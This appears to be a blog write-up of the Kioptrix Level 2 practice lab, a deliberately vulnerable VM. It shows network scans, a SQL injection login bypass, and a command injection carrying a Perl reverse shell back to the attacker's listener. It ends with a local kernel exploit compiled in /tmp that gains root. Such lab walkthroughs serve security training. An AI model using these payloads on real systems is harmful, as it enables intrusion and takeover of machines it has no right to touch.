Kioptrix Level 2
netdiscover -r 123.123.123.0/24
123.123.123.101 00:0c:29:9c:4b:ac 1 60 VMware, Inc.
nmap -T4 -A -v 123.123.123.101
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 655/udp status
|_ 100024 1 658/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-10-08T00:10:47
| Not valid after: 2010-10-08T00:10:47
| MD5: 01de 29f9 fbfb 2eb2 beaf e624 3157 090f
|_SHA-1: 560c 9196 6506 fb0f fb81 66b1 ded3 ac11 2ed4 808a
|_ssl-date: 2018-10-01T18:52:15+00:00; +10h50m06s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
|_ SSL2_RC2_128_CBC_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
| Supported Methods: GET HEAD OPTIONS POST PUT
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:9C:4B:AC (VMware)
Device type: general purpose|media device
Running: Linux 2.6.X, Star Track embedded
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:2.6.23 cpe:/h:star_track:srt2014hd
OS details: Linux 2.6.9 - 2.6.30, Star Track SRT2014HD satellite receiver (Linux 2.6.23)
Uptime guess: 49.709 days (since Sun Aug 12 22:01:26 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=198 (Good luck!)
IP ID Sequence Generation: All zeros
Host script results:
|_clock-skew: mean: 10h50m05s, deviation: 0s, median: 10h50m05s
http://123.123.123.101/
The Remote System Administration Login webpage was been tested for SQL injection attacks and it was found out that using 1' or '1' = '1 as the username and password
1' or '1' = '1
After login, we try with command injection:
;perl -e 'use Socket;$i="123.123.123.201";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
root@KaliLNX:/opt/VMs/Kioptrix_Level_2# nc -nlvp 443
listening on [any] 443 ...
connect to [123.123.123.201] from (UNKNOWN) [123.123.123.101] 32770
bash: no job control in this shell
bash-3.00$ bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$
cd /tmp
gcc -Wall -o linux-sendpage 9545.c
bash-3.00$ gcc -Wall -o linux-sendpage 9545.c
9545.c:376:28: warning: no newline at end of file
bash-3.00$ ls -l
total 28
-rw-r--r-- 1 apache apache 9783 Sep 26 04:36 9545.c
-rwxr-xr-x 1 apache apache 6762 Sep 25 21:24 e
-rwxr-xr-x 1 apache apache 6762 Oct 1 15:16 linux-sendpage
bash-3.00$
./linux-sendpage
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00#
No comments:
Post a Comment